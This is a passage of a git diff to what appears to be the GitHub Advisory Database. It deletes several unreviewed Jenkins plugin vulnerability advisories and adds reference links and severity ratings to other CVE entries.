"http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json b/advisories/unreviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json deleted file mode 100644 index be89dfa4c105e..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-63vw-rprv-4f8j", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41938" - ], - "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Ivy Plugin 2.5 and earlier allows attackers to delete disabled modules.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41938" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3093" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-6xcr-xqjv-c7jp/GHSA-6xcr-xqjv-c7jp.json b/advisories/unreviewed/2023/09/GHSA-6xcr-xqjv-c7jp/GHSA-6xcr-xqjv-c7jp.json index 31f25383162d0..3e2295aad5c04 100644 --- a/advisories/unreviewed/2023/09/GHSA-6xcr-xqjv-c7jp/GHSA-6xcr-xqjv-c7jp.json +++ b/advisories/unreviewed/2023/09/GHSA-6xcr-xqjv-c7jp/GHSA-6xcr-xqjv-c7jp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6xcr-xqjv-c7jp", - "modified": "2023-09-27T21:30:31Z", + "modified": "2024-01-31T15:30:18Z", "published": "2023-09-27T15:30:34Z", "aliases": [ "CVE-2023-35074" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EEMDC5TQAANFH5D77QM34ZTUKXPFGVL/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213936" @@ -74,7 +78,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-27T15:18:52Z" diff --git a/advisories/unreviewed/2023/09/GHSA-84c6-x9x8-7q38/GHSA-84c6-x9x8-7q38.json b/advisories/unreviewed/2023/09/GHSA-84c6-x9x8-7q38/GHSA-84c6-x9x8-7q38.json index 05031a7847f24..2ce4a41fa30a9 100644 --- a/advisories/unreviewed/2023/09/GHSA-84c6-x9x8-7q38/GHSA-84c6-x9x8-7q38.json +++ b/advisories/unreviewed/2023/09/GHSA-84c6-x9x8-7q38/GHSA-84c6-x9x8-7q38.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-84c6-x9x8-7q38", - "modified": "2023-09-27T18:30:24Z", + "modified": "2024-01-31T15:30:18Z", "published": "2023-09-27T15:30:35Z", "aliases": [ "CVE-2023-39434" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39434" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213937" @@ -54,7 +58,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-27T15:18:56Z" diff --git a/advisories/unreviewed/2023/09/GHSA-84xc-6h2g-44j4/GHSA-84xc-6h2g-44j4.json b/advisories/unreviewed/2023/09/GHSA-84xc-6h2g-44j4/GHSA-84xc-6h2g-44j4.json index 0b4760a2338ef..e4bf427279833 100644 --- a/advisories/unreviewed/2023/09/GHSA-84xc-6h2g-44j4/GHSA-84xc-6h2g-44j4.json +++ b/advisories/unreviewed/2023/09/GHSA-84xc-6h2g-44j4/GHSA-84xc-6h2g-44j4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-84xc-6h2g-44j4", - "modified": "2023-09-15T15:30:14Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4901" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:08Z" diff --git a/advisories/unreviewed/2023/09/GHSA-8cgp-x4c5-vg9g/GHSA-8cgp-x4c5-vg9g.json b/advisories/unreviewed/2023/09/GHSA-8cgp-x4c5-vg9g/GHSA-8cgp-x4c5-vg9g.json index 7b7dac1162ef4..a6cc175fc0b51 100644 --- a/advisories/unreviewed/2023/09/GHSA-8cgp-x4c5-vg9g/GHSA-8cgp-x4c5-vg9g.json +++ b/advisories/unreviewed/2023/09/GHSA-8cgp-x4c5-vg9g/GHSA-8cgp-x4c5-vg9g.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5491" diff --git a/advisories/unreviewed/2023/09/GHSA-8j7g-fq3w-jp2m/GHSA-8j7g-fq3w-jp2m.json b/advisories/unreviewed/2023/09/GHSA-8j7g-fq3w-jp2m/GHSA-8j7g-fq3w-jp2m.json index 478e8a0f35b9f..3798db62234fe 100644 --- a/advisories/unreviewed/2023/09/GHSA-8j7g-fq3w-jp2m/GHSA-8j7g-fq3w-jp2m.json +++ b/advisories/unreviewed/2023/09/GHSA-8j7g-fq3w-jp2m/GHSA-8j7g-fq3w-jp2m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8j7g-fq3w-jp2m", - "modified": "2023-09-15T18:30:30Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4903" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:08Z" diff --git a/advisories/unreviewed/2023/09/GHSA-8vvp-9m42-3rr2/GHSA-8vvp-9m42-3rr2.json b/advisories/unreviewed/2023/09/GHSA-8vvp-9m42-3rr2/GHSA-8vvp-9m42-3rr2.json index 0a942994c24fa..8569956570d0b 100644 --- a/advisories/unreviewed/2023/09/GHSA-8vvp-9m42-3rr2/GHSA-8vvp-9m42-3rr2.json +++ b/advisories/unreviewed/2023/09/GHSA-8vvp-9m42-3rr2/GHSA-8vvp-9m42-3rr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8vvp-9m42-3rr2", - "modified": "2023-09-15T15:30:14Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4905" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:08Z" diff --git a/advisories/unreviewed/2023/09/GHSA-9246-g3q2-xx2v/GHSA-9246-g3q2-xx2v.json b/advisories/unreviewed/2023/09/GHSA-9246-g3q2-xx2v/GHSA-9246-g3q2-xx2v.json index 02a225a6dd6f3..c01bc43af1b68 100644 --- a/advisories/unreviewed/2023/09/GHSA-9246-g3q2-xx2v/GHSA-9246-g3q2-xx2v.json +++ b/advisories/unreviewed/2023/09/GHSA-9246-g3q2-xx2v/GHSA-9246-g3q2-xx2v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9246-g3q2-xx2v", - "modified": "2023-09-15T15:30:14Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4907" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:08Z" diff --git a/advisories/unreviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json b/advisories/unreviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json deleted file mode 100644 index 9d07448fd65d3..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-997j-37h7-mhg9", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41942" - ], - "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers to clear the SQS queue.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41942" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(2)" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json b/advisories/unreviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json deleted file mode 100644 index 118be2d21a165..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9v8g-f9mq-739g", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41934" - ], - "details": "Jenkins Pipeline Maven Integration Plugin 1330.v18e473854496 and earlier does not properly mask (i.e., replace with asterisks) usernames of credentials specified in custom Maven settings in Pipeline build logs if \"Treat username as secret\" is checked.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41934" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3257" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-c7f5-x28q-2rr2/GHSA-c7f5-x28q-2rr2.json b/advisories/unreviewed/2023/09/GHSA-c7f5-x28q-2rr2/GHSA-c7f5-x28q-2rr2.json index cebe54595b131..f6588e70461d4 100644 --- a/advisories/unreviewed/2023/09/GHSA-c7f5-x28q-2rr2/GHSA-c7f5-x28q-2rr2.json +++ b/advisories/unreviewed/2023/09/GHSA-c7f5-x28q-2rr2/GHSA-c7f5-x28q-2rr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c7f5-x28q-2rr2", - "modified": "2023-09-15T15:30:14Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4900" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:08Z" diff --git a/advisories/unreviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json b/advisories/unreviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json deleted file mode 100644 index 97634a988adfe..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c7r5-cww9-64q6", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41930" - ], - "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict the 'name' query parameter when rendering a history entry, allowing attackers to have Jenkins render a manipulated configuration history that was not created by the plugin.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41930" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3233" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json b/advisories/unreviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json deleted file mode 100644 index f2c9fe378f17f..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cgh7-rgqg-hrcx", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41932" - ], - "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict 'timestamp' query parameters in multiple endpoints, allowing attackers with to delete attacker-specified directories on the Jenkins controller file system as long as they contain a file called 'history.xml'.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41932" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3235" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json b/advisories/unreviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json deleted file mode 100644 index 3a81dffa633d3..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g4qf-5523-7wvf", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41944" - ], - "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not escape the queue name parameter passed to a form validation URL, when rendering an error message, resulting in an HTML injection vulnerability.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41944" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3102" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json b/advisories/unreviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json deleted file mode 100644 index 8d06259a6f773..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g6rx-2w84-xmgj", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41946" - ], - "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers to connect to Frugal Testing using attacker-specified credentials, and to retrieve test IDs and names from Frugal Testing, if a valid credential corresponds to the attacker-specified username.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41946" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3082" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-g8c4-rhfw-rcpw/GHSA-g8c4-rhfw-rcpw.json b/advisories/unreviewed/2023/09/GHSA-g8c4-rhfw-rcpw/GHSA-g8c4-rhfw-rcpw.json index d44bb060770df..7f6d15d5c3a14 100644 --- a/advisories/unreviewed/2023/09/GHSA-g8c4-rhfw-rcpw/GHSA-g8c4-rhfw-rcpw.json +++ b/advisories/unreviewed/2023/09/GHSA-g8c4-rhfw-rcpw/GHSA-g8c4-rhfw-rcpw.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5084" }, + { + "type": "WEB", + "url": "https://github.com/hestiacp/hestiacp/pull/4013/commits/5131f5a966759df77477fdf7f29daa2bda93b1ff" + }, { "type": "WEB", "url": "https://github.com/hestiacp/hestiacp/commit/5131f5a966759df77477fdf7f29daa2bda93b1ff" diff --git a/advisories/unreviewed/2023/09/GHSA-h54p-v85c-f69r/GHSA-h54p-v85c-f69r.json b/advisories/unreviewed/2023/09/GHSA-h54p-v85c-f69r/GHSA-h54p-v85c-f69r.json index 8dda548262d7d..acd63c0283777 100644 --- a/advisories/unreviewed/2023/09/GHSA-h54p-v85c-f69r/GHSA-h54p-v85c-f69r.json +++ b/advisories/unreviewed/2023/09/GHSA-h54p-v85c-f69r/GHSA-h54p-v85c-f69r.json @@ -28,6 +28,10 @@ { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-887122.pdf" + }, + { + "type": "WEB", + "url": "https://www.bentley.com/advisories/be-2023-0004/" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/09/GHSA-hg3r-958g-g8vq/GHSA-hg3r-958g-g8vq.json b/advisories/unreviewed/2023/09/GHSA-hg3r-958g-g8vq/GHSA-hg3r-958g-g8vq.json index 9d7a85a2752a5..f9e914d1adb12 100644 --- a/advisories/unreviewed/2023/09/GHSA-hg3r-958g-g8vq/GHSA-hg3r-958g-g8vq.json +++ b/advisories/unreviewed/2023/09/GHSA-hg3r-958g-g8vq/GHSA-hg3r-958g-g8vq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hg3r-958g-g8vq", - "modified": "2023-09-29T21:30:41Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-28T18:30:45Z", "aliases": [ "CVE-2023-5187" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5508" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-28T16:15:10Z" diff --git a/advisories/unreviewed/2023/09/GHSA-hg4h-2m22-83j4/GHSA-hg4h-2m22-83j4.json b/advisories/unreviewed/2023/09/GHSA-hg4h-2m22-83j4/GHSA-hg4h-2m22-83j4.json index 5a240cbd0c6fb..959b32b1b7240 100644 --- a/advisories/unreviewed/2023/09/GHSA-hg4h-2m22-83j4/GHSA-hg4h-2m22-83j4.json +++ b/advisories/unreviewed/2023/09/GHSA-hg4h-2m22-83j4/GHSA-hg4h-2m22-83j4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hg4h-2m22-83j4", - "modified": "2023-09-16T00:30:30Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-09-16T00:30:30Z", "aliases": [ "CVE-2023-36562" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36562" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-15T22:15:13Z" diff --git a/advisories/unreviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json b/advisories/unreviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json deleted file mode 100644 index 1ce496b05a87c..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-hj7p-h74j-6gxj", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41935" - ], - "details": "Jenkins Azure AD Plugin 396.v86ce29279947 and earlier, except 378.380.v545b_1154b_3fb_, uses a non-constant time comparison function when checking whether the provided and expected CSRF protection nonce are equal, potentially allowing attackers to use statistical methods to obtain a valid nonce.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41935" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3227" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-j4rp-ppmv-7whr/GHSA-j4rp-ppmv-7whr.json b/advisories/unreviewed/2023/09/GHSA-j4rp-ppmv-7whr/GHSA-j4rp-ppmv-7whr.json index e9754f8afc40f..4e6b15d16806c 100644 --- a/advisories/unreviewed/2023/09/GHSA-j4rp-ppmv-7whr/GHSA-j4rp-ppmv-7whr.json +++ b/advisories/unreviewed/2023/09/GHSA-j4rp-ppmv-7whr/GHSA-j4rp-ppmv-7whr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j4rp-ppmv-7whr", - "modified": "2023-09-15T15:30:14Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4906" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:08Z" diff --git a/advisories/unreviewed/2023/09/GHSA-j66v-q82h-4f8h/GHSA-j66v-q82h-4f8h.json b/advisories/unreviewed/2023/09/GHSA-j66v-q82h-4f8h/GHSA-j66v-q82h-4f8h.json index 66eb6d86ffb6d..c2d4b0c4cf2ec 100644 --- a/advisories/unreviewed/2023/09/GHSA-j66v-q82h-4f8h/GHSA-j66v-q82h-4f8h.json +++ b/advisories/unreviewed/2023/09/GHSA-j66v-q82h-4f8h/GHSA-j66v-q82h-4f8h.json @@ -105,6 +105,18 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0562" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0563" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0593" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-42753" diff --git a/advisories/unreviewed/2023/09/GHSA-j6rc-chh6-q5hw/GHSA-j6rc-chh6-q5hw.json b/advisories/unreviewed/2023/09/GHSA-j6rc-chh6-q5hw/GHSA-j6rc-chh6-q5hw.json index 186e74603cd89..0f8b507e3f9c2 100644 --- a/advisories/unreviewed/2023/09/GHSA-j6rc-chh6-q5hw/GHSA-j6rc-chh6-q5hw.json +++ b/advisories/unreviewed/2023/09/GHSA-j6rc-chh6-q5hw/GHSA-j6rc-chh6-q5hw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6rc-chh6-q5hw", - "modified": "2023-09-16T00:30:30Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-09-16T00:30:30Z", "aliases": [ "CVE-2023-36735" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36735" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-15T22:15:13Z" diff --git a/advisories/unreviewed/2023/09/GHSA-m7p3-g2hx-xfc3/GHSA-m7p3-g2hx-xfc3.json b/advisories/unreviewed/2023/09/GHSA-m7p3-g2hx-xfc3/GHSA-m7p3-g2hx-xfc3.json index 7502d050f24a6..18fb3e5aea50c 100644 --- a/advisories/unreviewed/2023/09/GHSA-m7p3-g2hx-xfc3/GHSA-m7p3-g2hx-xfc3.json +++ b/advisories/unreviewed/2023/09/GHSA-m7p3-g2hx-xfc3/GHSA-m7p3-g2hx-xfc3.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2240541" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-01" + }, { "type": "WEB", "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=30884" diff --git a/advisories/unreviewed/2023/09/GHSA-mwc5-mc4g-5jw5/GHSA-mwc5-mc4g-5jw5.json b/advisories/unreviewed/2023/09/GHSA-mwc5-mc4g-5jw5/GHSA-mwc5-mc4g-5jw5.json index 58743b029a2fc..b259dd3832184 100644 --- a/advisories/unreviewed/2023/09/GHSA-mwc5-mc4g-5jw5/GHSA-mwc5-mc4g-5jw5.json +++ 